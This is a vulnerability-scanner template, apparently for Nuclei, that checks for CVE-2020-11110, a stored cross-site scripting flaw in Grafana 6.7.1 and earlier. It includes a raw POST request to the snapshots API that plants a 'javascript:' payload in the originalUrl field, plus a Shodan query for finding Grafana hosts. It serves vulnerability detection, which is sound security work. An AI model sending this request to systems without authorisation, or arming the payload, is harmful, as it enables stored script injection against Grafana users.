id: CVE-2020-11110

info:
  name: Grafana <= 6.7.1 - Cross-Site Scripting
  author: emadshanab
  severity: medium
  description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
  reference:
    - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
    - https://github.com/grafana/grafana/pull/23254
    - https://security.netapp.com/advisory/ntap-20200810-0002/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
    - https://hackerone.com/reports/1329433
  remediation: This issue can be resolved by updating Grafana to the latest version.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-11110
    cwe-id: CWE-79
    epss-score: 0.001
  metadata:
    max-request: 1
    shodan-query: title:"Grafana"
  tags: cve,cve2020,xss,grafana,hackerone

http:
  - raw:
      - |
        POST /api/snapshots HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Referer: {{BaseURL}}
        content-type: application/json
        Connection: close

        {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - application/json

      - type: word
        part: body
        words:
          - '"deleteKey":'
          - '"deleteUrl":'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"url":"([a-z:/0-9A-Z]+)"'

# Enhanced by mp on 2022/09/02